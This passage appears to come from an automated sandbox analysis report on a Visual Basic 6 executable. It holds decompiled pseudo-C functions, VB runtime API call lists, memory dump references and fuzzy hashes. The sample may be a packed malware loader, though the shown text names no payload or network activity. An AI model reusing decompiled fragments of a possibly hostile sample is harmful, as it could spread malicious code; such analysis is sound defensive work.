              • __vbaFpI4.MSVBVM60(00411B2C,00000000,00000000,00411918,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414D9A
              • __vbaHresultCheckObj.MSVBVM60(00000000,004014E0,0041046C,000002C8,?,?,?,?,00000000,00411B2C,00000000,00000000,00411918), ref: 00414DF3
              • __vbaNew2.MSVBVM60(004119C8,004183D8,00411B2C,00000000,00000000,00411918,00000000,00000001,000000FF,00000000,?,?,?,?,004016F6), ref: 00414E14
              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004119B8,00000014), ref: 00414E58
              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411B34,00000108), ref: 00414E99
              • __vbaFreeObj.MSVBVM60(00000000,00000000,00411B34,00000108), ref: 00414EB2
              • __vbaLenBstr.MSVBVM60(00411B48), ref: 00414EBC
              • __vbaInStr.MSVBVM60(00000000,Hofdesserternes7,samtaleemnetsrhes,FF8D5482,00411B48), ref: 00414ED7
              • __vbaFreeStr.MSVBVM60(00414EFF,00411B48), ref: 00414EF9
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$CheckHresult$Free$#712BstrChkstkCopyMoveNew2
              • String ID: Hofdesserternes7$samtaleemnetsrhes$val
              • API String ID: 1974484846-2599820437
              • Opcode ID: a70e6b2ba6647b20f675a6f97ac6d6f3f7096d905f9b783b9c55a0f79d1ae3bf
              • Instruction ID: 360f43f188a17bf89f57c6a763a2aaad3340e8aaa3ed13bc6e4b1624944ae6a3
              • Opcode Fuzzy Hash: a70e6b2ba6647b20f675a6f97ac6d6f3f7096d905f9b783b9c55a0f79d1ae3bf
              • Instruction Fuzzy Hash: 31512671950208EFCB00AFA5D945FDEBBB0BF08704F20812AF515BB2B0DBB95994DB59
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004173AC, Relevance: 27.2, APIs: 18, Instructions: 171COMMON
              Download Yara Rule
              C-Code - Quality: 57%
              			E004173AC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v56;
				void* _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr* _v92;
				signed int _v96;
				signed int _v100;
				intOrPtr* _v104;
				signed int _v108;
				signed int _v112;
				signed int _t96;
				signed int _t101;
				signed int _t102;
				signed int _t106;
				signed int _t112;
				signed int _t118;
				void* _t135;
				void* _t137;
				intOrPtr _t138;

				_t138 = _t137 - 0xc;
				 *[fs:0x0] = _t138;
				L004016F0();
				_v16 = _t138;
				_v12 = 0x4016e0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x58,  *[fs:0x0], 0x4016f6, _t135);
				if( *0x4183d8 != 0) {
					_v92 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x4119c8);
					L004018C4();
					_v92 = 0x4183d8;
				}
				_v60 =  *_v92;
				_t96 =  *((intOrPtr*)( *_v60 + 0x14))(_v60,  &_v40);
				asm("fclex");
				_v64 = _t96;
				if(_v64 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4119b8);
					_push(_v60);
					_push(_v64);
					L00401906();
					_v96 = _t96;
				}
				_v68 = _v40;
				_t101 =  *((intOrPtr*)( *_v68 + 0xe0))(_v68,  &_v36);
				asm("fclex");
				_v72 = _t101;
				if(_v72 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x411b34);
					_push(_v68);
					_push(_v72);
					L00401906();
					_v100 = _t101;
				}
				_t102 = _v36;
				_v84 = _t102;
				_v36 = _v36 & 0x00000000;
				L00401882();
				L004018AC();
				_push(1);
				_push(0x411e1c);
				L00401786();
				L00401882();
				_push(_t102);
				_push(0x411bb0);
				L0040184C();
				asm("sbb eax, eax");
				_v60 =  ~( ~( ~_t102));
				L00401924();
				_t106 = _v60;
				if(_t106 != 0) {
					if( *0x4183d8 != 0) {
						_v104 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4119c8);
						L004018C4();
						_v104 = 0x4183d8;
					}
					_v60 =  *_v104;
					_t112 =  *((intOrPtr*)( *_v60 + 0x1c))(_v60,  &_v40);
					asm("fclex");
					_v64 = _t112;
					if(_v64 >= 0) {
						_v108 = _v108 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x4119b8);
						_push(_v60);
						_push(_v64);
						L00401906();
						_v108 = _t112;
					}
					_v68 = _v40;
					_v48 = 0x80020004;
					_v56 = 0xa;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t118 =  *((intOrPtr*)( *_v68 + 0x5c))(_v68, 0x10,  &_v36);
					asm("fclex");
					_v72 = _t118;
					if(_v72 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x5c);
						_push(0x411b0c);
						_push(_v68);
						_push(_v72);
						L00401906();
						_v112 = _t118;
					}
					_t106 = _v36;
					_v88 = _t106;
					_v36 = _v36 & 0x00000000;
					L00401882();
					L004018AC();
				}
				_push(0x4175f5);
				L00401924();
				L00401924();
				return _t106;
			}

































              0x004173af
              0x004173be
              0x004173c8
              0x004173d0
              0x004173d3
              0x004173da
              0x004173e9
              0x004173f3
              0x0041740d
              0x004173f5
              0x004173f5
              0x004173fa
              0x004173ff
              0x00417404
              0x00417404
              0x00417419
              0x00417428
              0x0041742b
              0x0041742d
              0x00417434
              0x0041744d
              0x00417436
              0x00417436
              0x00417438
              0x0041743d
              0x00417440
              0x00417443
              0x00417448
              0x00417448
              0x00417454
              0x00417463
              0x00417469
              0x0041746b
              0x00417472
              0x0041748e
              0x00417474
              0x00417474
              0x00417479
              0x0041747e
              0x00417481
              0x00417484
              0x00417489
              0x00417489
              0x00417492
              0x00417495
              0x00417498
              0x004174a2
              0x004174aa
              0x004174af
              0x004174b1
              0x004174b6
              0x004174c0
              0x004174c5
              0x004174c6
              0x004174cb
              0x004174d2
              0x004174d8
              0x004174df
              0x004174e4
              0x004174ea
              0x004174f7
              0x00417511
              0x004174f9
              0x004174f9
              0x004174fe
              0x00417503
              0x00417508
              0x00417508
              0x0041751d
              0x0041752c
              0x0041752f
              0x00417531
              0x00417538
              0x00417551
              0x0041753a
              0x0041753a
              0x0041753c
              0x00417541
              0x00417544
              0x00417547
              0x0041754c
              0x0041754c
              0x00417558
              0x0041755b
              0x00417562
              0x00417570
              0x0041757a
              0x0041757b
              0x0041757c
              0x0041757d
              0x00417586
              0x00417589
              0x0041758b
              0x00417592
              0x004175ab
              0x00417594
              0x00417594
              0x00417596
              0x0041759b
              0x0041759e
              0x004175a1
              0x004175a6
              0x004175a6
              0x004175af
              0x004175b2
              0x004175b5
              0x004175bf
              0x004175c7
              0x004175c7
              0x004175cc
              0x004175e7
              0x004175ef
              0x004175f4

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 004173C8
              • __vbaNew2.MSVBVM60(004119C8,004183D8,?,?,?,?,004016F6), ref: 004173FF
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,00000014), ref: 00417443
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411B34,000000E0), ref: 00417484
              • __vbaStrMove.MSVBVM60(00000000,?,00411B34,000000E0), ref: 004174A2
              • __vbaFreeObj.MSVBVM60(00000000,?,00411B34,000000E0), ref: 004174AA
              • #616.MSVBVM60(00411E1C,00000001), ref: 004174B6
              • __vbaStrMove.MSVBVM60(00411E1C,00000001), ref: 004174C0
              • __vbaStrCmp.MSVBVM60(00411BB0,00000000,00411E1C,00000001), ref: 004174CB
              • __vbaFreeStr.MSVBVM60(00411BB0,00000000,00411E1C,00000001), ref: 004174DF
              • __vbaNew2.MSVBVM60(004119C8,004183D8,00411BB0,00000000,00411E1C,00000001), ref: 00417503
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,0000001C), ref: 00417547
              • __vbaChkstk.MSVBVM60(00000000), ref: 00417570
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411B0C,0000005C), ref: 004175A1
              • __vbaStrMove.MSVBVM60(00000000,?,00411B0C,0000005C), ref: 004175BF
              • __vbaFreeObj.MSVBVM60(00000000,?,00411B0C,0000005C), ref: 004175C7
              • __vbaFreeStr.MSVBVM60(004175F5,00411BB0,00000000,00411E1C,00000001), ref: 004175E7
              • __vbaFreeStr.MSVBVM60(004175F5,00411BB0,00000000,00411E1C,00000001), ref: 004175EF
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$CheckHresult$Move$ChkstkNew2$#616
              • String ID:
              • API String ID: 5717343-0
              • Opcode ID: a8136cd697cf49ed3808fa5623bce1bb48f40bb4be6dbe6a4a1c8738be6ff5d2
              • Instruction ID: 1749aab6c9c9f98a436355f854e78664b3a120ebd459ec5bb837193a5fb8d99f
              • Opcode Fuzzy Hash: a8136cd697cf49ed3808fa5623bce1bb48f40bb4be6dbe6a4a1c8738be6ff5d2
              • Instruction Fuzzy Hash: E071E171940208AFDF00EF95D885BDEBBB1AF08705F20442AE505BB2A1DBB96985DB58
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004158F9, Relevance: 25.7, APIs: 17, Instructions: 158COMMON
              Download Yara Rule
              C-Code - Quality: 34%
              			E004158F9(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				void* _v48;
				signed int _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				char* _v76;
				char _v84;
				intOrPtr* _v104;
				signed int _v108;
				intOrPtr* _v112;
				signed int _v116;
				signed int _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				char* _t78;
				char* _t79;
				signed int _t85;
				signed int _t92;
				signed int _t98;
				intOrPtr _t118;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t118;
				L004016F0();
				_v12 = _t118;
				_v8 = 0x401570;
				_push(0x411bd8);
				L004017F2();
				if(0x80 != 2) {
					if( *0x4183d8 != 0) {
						_v132 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4119c8);
						L004018C4();
						_v132 = 0x4183d8;
					}
					_v104 =  *_v132;
					_t92 =  *((intOrPtr*)( *_v104 + 0x1c))(_v104,  &_v48);
					asm("fclex");
					_v108 = _t92;
					if(_v108 >= 0) {
						_v136 = _v136 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x4119b8);
						_push(_v104);
						_push(_v108);
						L00401906();
						_v136 = _t92;
					}
					_v112 = _v48;
					_v76 = 0x80020004;
					_v84 = 0xa;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t98 =  *((intOrPtr*)( *_v112 + 0x54))(_v112, 0x10,  &_v52);
					asm("fclex");
					_v116 = _t98;
					if(_v116 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x54);
						_push(0x411b0c);
						_push(_v112);
						_push(_v116);
						L00401906();
						_v140 = _t98;
					}
					_v124 = _v52;
					_v52 = _v52 & 0x00000000;
					_v60 = _v124;
					_v68 = 9;
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v40);
					L0040191E();
					L004018AC();
					L00401912();
				}
				_v76 =  &_v24;
				_v84 = 0x6003;
				_t78 =  &_v84;
				_push(_t78);
				L0040185E();
				if(_t78 != 0xffff) {
					if( *0x4183d8 != 0) {
						_v144 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x4119c8);
						L004018C4();
						_v144 = 0x4183d8;
					}
					_v104 =  *_v144;
					_t85 =  *((intOrPtr*)( *_v104 + 0x48))(_v104, 0x43,  &_v44);
					asm("fclex");
					_v108 = _t85;
					if(_v108 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x4119b8);
						_push(_v104);
						_push(_v108);
						L00401906();
						_v148 = _t85;
					}
					_v128 = _v44;
					_v44 = _v44 & 0x00000000;
					L00401882();
				}
				_v36 = 0x76e8d350;
				_v32 = 0x5af4;
				_push(0x415b47);
				_t79 =  &_v24;
				_push(_t79);
				_push(0);
				L00401858();
				L00401924();
				L004018AC();
				return _t79;
			}


































              0x004158fe
              0x00415909
              0x0041590a
              0x00415916
              0x0041591e
              0x00415921
              0x00415928
              0x0041592d
              0x00415935
              0x00415942
              0x0041595c
              0x00415944
              0x00415944
              0x00415949
              0x0041594e
              0x00415953
              0x00415953
              0x00415968
              0x00415977
              0x0041597a
              0x0041597c
              0x00415983
              0x0041599f
              0x00415985
              0x00415985
              0x00415987
              0x0041598c
              0x0041598f
              0x00415992
              0x00415997
              0x00415997
              0x004159a9
              0x004159ac
              0x004159b3
              0x004159c1
              0x004159cb
              0x004159cc
              0x004159cd
              0x004159ce
              0x004159d7
              0x004159da
              0x004159dc
              0x004159e3
              0x004159ff
              0x004159e5
              0x004159e5
              0x004159e7
              0x004159ec
              0x004159ef
              0x004159f2
              0x004159f7
              0x004159f7
              0x00415a09
              0x00415a0c
              0x00415a13
              0x00415a16
              0x00415a1d
              0x00415a20
              0x00415a2a
              0x00415a2b
              0x00415a2c
              0x00415a2d
              0x00415a2e
              0x00415a30
              0x00415a33
              0x00415a3b
              0x00415a43
              0x00415a43
              0x00415a4b
              0x00415a4e
              0x00415a55
              0x00415a58
              0x00415a59
              0x00415a62
              0x00415a6f
              0x00415a8c
              0x00415a71
              0x00415a71
              0x00415a76
              0x00415a7b
              0x00415a80
              0x00415a80
              0x00415a9e
              0x00415aaf
              0x00415ab2
              0x00415ab4
              0x00415abb
              0x00415ad7
              0x00415abd
              0x00415abd
              0x00415abf
              0x00415ac4
              0x00415ac7
              0x00415aca
              0x00415acf
              0x00415acf
              0x00415ae1
              0x00415ae4
              0x00415aee
              0x00415aee
              0x00415af3
              0x00415afa
              0x00415b01
              0x00415b2b
              0x00415b2e
              0x00415b2f
              0x00415b31
              0x00415b39
              0x00415b41
              0x00415b46

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00415916
              • __vbaLenBstrB.MSVBVM60(00411BD8,?,?,?,?,004016F6), ref: 0041592D
              • __vbaNew2.MSVBVM60(004119C8,004183D8,00411BD8,?,?,?,?,004016F6), ref: 0041594E
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,0000001C), ref: 00415992
              • __vbaChkstk.MSVBVM60(?), ref: 004159C1
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411B0C,00000054), ref: 004159F2
              • __vbaChkstk.MSVBVM60(00000000,?,00411B0C,00000054), ref: 00415A20
              • __vbaLateIdSt.MSVBVM60(?,00000000), ref: 00415A33
              • __vbaFreeObj.MSVBVM60(?,00000000), ref: 00415A3B
              • __vbaFreeVar.MSVBVM60(?,00000000), ref: 00415A43
              • #556.MSVBVM60(00006003,?,?,?,?,?,?,?,?,?,?,?,?,00411BD8), ref: 00415A59
              • __vbaNew2.MSVBVM60(004119C8,004183D8,00006003,?,?,?,?,?,?,?,?,?,?,?,?,00411BD8), ref: 00415A7B
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,00000048), ref: 00415ACA
              • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00006003), ref: 00415AEE
              • __vbaAryDestruct.MSVBVM60(00000000,?,00415B47,00006003), ref: 00415B31
              • __vbaFreeStr.MSVBVM60(00000000,?,00415B47,00006003), ref: 00415B39
              • __vbaFreeObj.MSVBVM60(00000000,?,00415B47,00006003), ref: 00415B41
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$CheckChkstkHresult$New2$#556BstrDestructLateMove
              • String ID:
              • API String ID: 3585757769-0
              • Opcode ID: 15659bdb09528312e0f7f43040385e758d28e2d31aa8ee3d35a3f317ee072924
              • Instruction ID: eb4131a2da14ee919aff09e508e7911d58d6b0803d92f06d12a9c860f40b6467
              • Opcode Fuzzy Hash: 15659bdb09528312e0f7f43040385e758d28e2d31aa8ee3d35a3f317ee072924
              • Instruction Fuzzy Hash: 5D61F4B1940718DFDB10EF94C886BDEBBB0BF08704F20416AE504BB2A1DBB95985DF19
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004163F5, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 150COMMON
              Download Yara Rule
              C-Code - Quality: 56%
              			E004163F5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				long long _v32;
				void* _v36;
				char _v52;
				char _v68;
				char* _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				char _v116;
				void* _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				signed long long _v144;
				signed int _v148;
				intOrPtr* _v152;
				signed int _v156;
				signed int _v160;
				signed int _t66;
				signed int _t69;
				signed int _t75;
				signed int _t80;
				short _t81;
				signed int _t84;
				char* _t87;
				intOrPtr _t94;
				intOrPtr* _t95;
				signed long long _t105;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t94;
				L004016F0();
				_v12 = _t94;
				_v8 = 0x401630;
				_v92 = L"01/01/01";
				_v100 = 8;
				_t87 =  &_v52;
				L004018A0();
				_push( &_v52);
				_push( &_v68);
				L004017C2();
				_v108 = 0x7d1;
				_v116 = 0x8002;
				_push( &_v68);
				_t66 =  &_v116;
				_push(_t66);
				L00401828();
				_v124 = _t66;
				_push( &_v68);
				_push( &_v52);
				_push(2);
				L00401942();
				_t95 = _t94 + 0xc;
				_t69 = _v124;
				if(_t69 != 0) {
					_push(_t87);
					_v52 =  *0x401628;
					_t105 =  *0x401620 *  *0x401618;
					if( *0x418000 != 0) {
						_push( *0x401614);
						_push( *0x401610);
						L00401714();
					} else {
						_t105 = _t105 /  *0x401610;
					}
					_v144 = _t105;
					 *_t95 = _v144;
					_v68 =  *0x401608;
					L0040183A();
					 *_t95 =  *0x4015f8;
					 *_t95 =  *0x4015f4;
					 *_t95 =  *0x4015f0;
					_t84 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t87, _t87, _t87, _t69, _t87, _t87);
					asm("fclex");
					_v124 = _t84;
					if(_v124 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x2c0);
						_push(0x41046c);
						_push(_a4);
						_push(_v124);
						L00401906();
						_v148 = _t84;
					}
				}
				if( *0x4183d8 != 0) {
					_v152 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x4119c8);
					L004018C4();
					_v152 = 0x4183d8;
				}
				_v124 =  *_v152;
				_t75 =  *((intOrPtr*)( *_v124 + 0x14))(_v124,  &_v36);
				asm("fclex");
				_v128 = _t75;
				if(_v128 >= 0) {
					_v156 = _v156 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4119b8);
					_push(_v124);
					_push(_v128);
					L00401906();
					_v156 = _t75;
				}
				_v132 = _v36;
				_t80 =  *((intOrPtr*)( *_v132 + 0x108))(_v132,  &_v120);
				asm("fclex");
				_v136 = _t80;
				if(_v136 >= 0) {
					_v160 = _v160 & 0x00000000;
				} else {
					_push(0x108);
					_push(0x411b34);
					_push(_v132);
					_push(_v136);
					L00401906();
					_v160 = _t80;
				}
				_t81 = _v120;
				_v24 = _t81;
				L004018AC();
				_v32 =  *0x4015e8;
				asm("wait");
				_push(0x41664a);
				return _t81;
			}


































              0x004163fa
              0x00416405
              0x00416406
              0x00416412
              0x0041641a
              0x0041641d
              0x00416424
              0x0041642b
              0x00416435
              0x00416438
              0x00416440
              0x00416444
              0x00416445
              0x0041644a
              0x00416451
              0x0041645b
              0x0041645c
              0x0041645f
              0x00416460
              0x00416465
              0x0041646c
              0x00416470
              0x00416471
              0x00416473
              0x00416478
              0x0041647b
              0x00416481
              0x0041648d
              0x0041648e
              0x00416497
              0x004164a4
              0x004164ae
              0x004164b4
              0x004164ba
              0x004164a6
              0x004164a6
              0x004164a6
              0x004164bf
              0x004164cc
              0x004164d6
              0x004164df
              0x004164ec
              0x004164f6
              0x00416500
              0x00416510
              0x00416516
              0x00416518
              0x0041651f
              0x0041653e
              0x00416521
              0x00416521
              0x00416526
              0x0041652b
              0x0041652e
              0x00416531
              0x00416536
              0x00416536
              0x0041651f
              0x0041654c
              0x00416569
              0x0041654e
              0x0041654e
              0x00416553
              0x00416558
              0x0041655d
              0x0041655d
              0x0041657b
              0x0041658a
              0x0041658d
              0x0041658f
              0x00416596
              0x004165b2
              0x00416598
              0x00416598
              0x0041659a
              0x0041659f
              0x004165a2
              0x004165a5
              0x004165aa
              0x004165aa
              0x004165bc
              0x004165cb
              0x004165d1
              0x004165d3
              0x004165e0
              0x00416602
              0x004165e2
              0x004165e2
              0x004165e7
              0x004165ec
              0x004165ef
              0x004165f5
              0x004165fa
              0x004165fa
              0x00416609
              0x0041660d
              0x00416614
              0x0041661f
              0x00416622
              0x00416623
              0x00000000

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00416412
              • __vbaVarDup.MSVBVM60 ref: 00416438
              • #553.MSVBVM60(?,?), ref: 00416445
              • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00416460
              • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 00416473
              • _adj_fdiv_m64.MSVBVM60 ref: 004164BA
              • __vbaFpI4.MSVBVM60 ref: 004164DF
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041046C,000002C0), ref: 00416531
              • __vbaNew2.MSVBVM60(004119C8,004183D8), ref: 00416558
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,00000014), ref: 004165A5
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411B34,00000108), ref: 004165F5
              • __vbaFreeObj.MSVBVM60(00000000,?,00411B34,00000108), ref: 00416614
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$CheckHresult$Free$#553ChkstkListNew2_adj_fdiv_m64
              • String ID: 01/01/01
              • API String ID: 2139296166-1279165767
              • Opcode ID: b30445c205fc5d97b27f58089cb201ce24d5b90fb2cd8502c42fbf0d3ac1511b
              • Instruction ID: c1d6cb4e5b920ec23e8ef05f0b70762298be7993761941387f92073563df8337
              • Opcode Fuzzy Hash: b30445c205fc5d97b27f58089cb201ce24d5b90fb2cd8502c42fbf0d3ac1511b
              • Instruction Fuzzy Hash: EF514571800218EFDB109FA0DD49BEDBBB8FB08704F1484AEE145B71A2DB789994DF18
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004168FA, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 96COMMON
              Download Yara Rule
              C-Code - Quality: 62%
              			E004168FA(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				signed int _v36;
				void* _v40;
				char _v56;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr _v84;
				intOrPtr* _v88;
				signed int _v92;
				signed int _v96;
				signed int _t60;
				signed int _t65;
				signed int _t66;
				void* _t78;
				void* _t80;
				intOrPtr _t81;

				_t81 = _t80 - 0xc;
				 *[fs:0x0] = _t81;
				L004016F0();
				_v16 = _t81;
				_v12 = 0x401650;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x48,  *[fs:0x0], 0x4016f6, _t78);
				_push(L"7:7:7");
				_push( &_v56);
				L004017AA();
				_push( &_v56);
				L004017B0();
				L00401882();
				L00401912();
				if( *0x4183d8 != 0) {
					_v88 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x4119c8);
					L004018C4();
					_v88 = 0x4183d8;
				}
				_v60 =  *_v88;
				_t60 =  *((intOrPtr*)( *_v60 + 0x14))(_v60,  &_v40);
				asm("fclex");
				_v64 = _t60;
				if(_v64 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4119b8);
					_push(_v60);
					_push(_v64);
					L00401906();
					_v92 = _t60;
				}
				_v68 = _v40;
				_t65 =  *((intOrPtr*)( *_v68 + 0xe0))(_v68,  &_v36);
				asm("fclex");
				_v72 = _t65;
				if(_v72 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x411b34);
					_push(_v68);
					_push(_v72);
					L00401906();
					_v96 = _t65;
				}
				_t66 = _v36;
				_v84 = _t66;
				_v36 = _v36 & 0x00000000;
				L00401882();
				L004018AC();
				_push(0x416a57);
				L00401924();
				L00401924();
				return _t66;
			}

























              0x004168fd
              0x0041690c
              0x00416916
              0x0041691e
              0x00416921
              0x00416928
              0x00416937
              0x0041693a
              0x00416942
              0x00416943
              0x0041694b
              0x0041694c
              0x00416956
              0x0041695e
              0x0041696a
              0x00416984
              0x0041696c
              0x0041696c
              0x00416971
              0x00416976
              0x0041697b
              0x0041697b
              0x00416990
              0x0041699f
              0x004169a2
              0x004169a4
              0x004169ab
              0x004169c4
              0x004169ad
              0x004169ad
              0x004169af
              0x004169b4
              0x004169b7
              0x004169ba
              0x004169bf
              0x004169bf
              0x004169cb
              0x004169da
              0x004169e0
              0x004169e2
              0x004169e9
              0x00416a05
              0x004169eb
              0x004169eb
              0x004169f0
              0x004169f5
              0x004169f8
              0x004169fb
              0x00416a00
              0x00416a00
              0x00416a09
              0x00416a0c
              0x00416a0f
              0x00416a19
              0x00416a21
              0x00416a26
              0x00416a49
              0x00416a51
              0x00416a56

              APIs
              • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00416916
              • #541.MSVBVM60(?,7:7:7,?,?,?,?,004016F6), ref: 00416943
              • __vbaStrVarMove.MSVBVM60(?,?,7:7:7,?,?,?,?,004016F6), ref: 0041694C
              • __vbaStrMove.MSVBVM60(?,?,7:7:7,?,?,?,?,004016F6), ref: 00416956
              • __vbaFreeVar.MSVBVM60(?,?,7:7:7,?,?,?,?,004016F6), ref: 0041695E
              • __vbaNew2.MSVBVM60(004119C8,004183D8,?,?,7:7:7,?,?,?,?,004016F6), ref: 00416976
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,004119B8,00000014), ref: 004169BA
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411B34,000000E0), ref: 004169FB
              • __vbaStrMove.MSVBVM60(00000000,?,00411B34,000000E0), ref: 00416A19
              • __vbaFreeObj.MSVBVM60(00000000,?,00411B34,000000E0), ref: 00416A21
              • __vbaFreeStr.MSVBVM60(00416A57), ref: 00416A49
              • __vbaFreeStr.MSVBVM60(00416A57), ref: 00416A51
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.474162328.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.474147086.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.474224879.0000000000418000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.474240187.000000000041A000.00000002.00020000.sdmp Download File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_400000_udmugning.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$Move$CheckHresult$#541ChkstkNew2
              • String ID: 7:7:7
              • API String ID: 1992979026-4135912237
              • Opcode ID: 32cc7d09358a9419ff020fce86781d796007d4f97e8f5ddd26b8dcfb9473f2fe
              • Instruction ID: f450aaa76391f11e2bed6468010ce39e748b74fad23caa079b14067207b89615
